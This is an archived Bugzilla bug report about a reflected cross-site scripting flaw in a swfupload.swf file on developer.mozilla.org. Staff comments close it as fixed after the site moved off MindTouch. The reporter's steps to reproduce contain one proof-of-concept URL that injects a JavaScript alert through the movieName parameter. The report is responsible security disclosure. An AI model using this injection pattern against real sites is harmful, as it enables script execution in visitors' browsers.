Closed
Bug 779954
Opened 13 years ago
Closed 13 years ago
Reflective XSS on https://developer.mozilla.org
Categories
(developer.mozilla.org Graveyard :: Wiki pages, defect)
developer.mozilla.org Graveyard
Wiki pages
Tracking
(Not tracked)
RESOLVED
FIXED
People
(Reporter: christian.matthies, Unassigned)
Details
(Keywords: reporter-external, sec-moderate, wsec-xss, Whiteboard: [site:developer.mozilla.org][reporter-external])
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:14.0) Gecko/20100101 Firefox/14.0.1
Build ID: 20120713134347
Steps to reproduce:
There is a reflective XSS vulnerability on this site:
https://developer.mozilla.org/skins/common/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%27XSS%27%29}}//
|
||
Updated•13 years ago
|
Group: mozilla-services-security → websites-security
Status: UNCONFIRMED → NEW
Component: General → Website
Ever confirmed: true
Product: Mozilla Services → Mozilla Developer Network
Version: unspecified → MDN
|
||
Comment 2•13 years ago
|
||
Was this fixed by switching the backend from MediaWiki to Kuma (which happened this morning at last), or is swfupload.swf still buried in there somewhere?
|
|
||
Comment 3•13 years ago
|
||
By which I meant to say "I can't reproduce this". I get a 404 error.
Hm, the content is gone. It was there when I filed the bug...
|
|
||
Comment 5•13 years ago
|
||
yeah, a constant stream of bugs like this is one reason we switched.
|
||
Comment 6•13 years ago
|
||
we stopped using mindtouch for our developer site, well, right after you found this. :) there is a new site to attack!
|
||
Comment 7•13 years ago
|
||
bye bye MindTouch skins and your impossibly convoluted security vulnerabilities that you never bother to fix!
Status: NEW → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
|
Assignee | |
Updated•13 years ago
|
Version: MDN → unspecified
|
|
Assignee | |
Updated•13 years ago
|
Component: Website → Landing pages
|
|
||
Comment 8•12 years ago
|
||
Adding keywords to bugs for metrics, no action required. Sorry about bugmail spam.
Keywords: wsec-xss
|
|
||
Updated•12 years ago
|
Keywords: sec-moderate
Whiteboard: [site:developer.mozilla.org][reporter-external]
|
||
Comment 9•9 years ago
|
||
For bugs that are resolved, we remove the security flag. These haven't had their flag removed, so I'm removing it now.
Group: websites-security
|
||
Updated•5 years ago
|
Product: developer.mozilla.org → developer.mozilla.org Graveyard
|
||
Updated•1 year ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•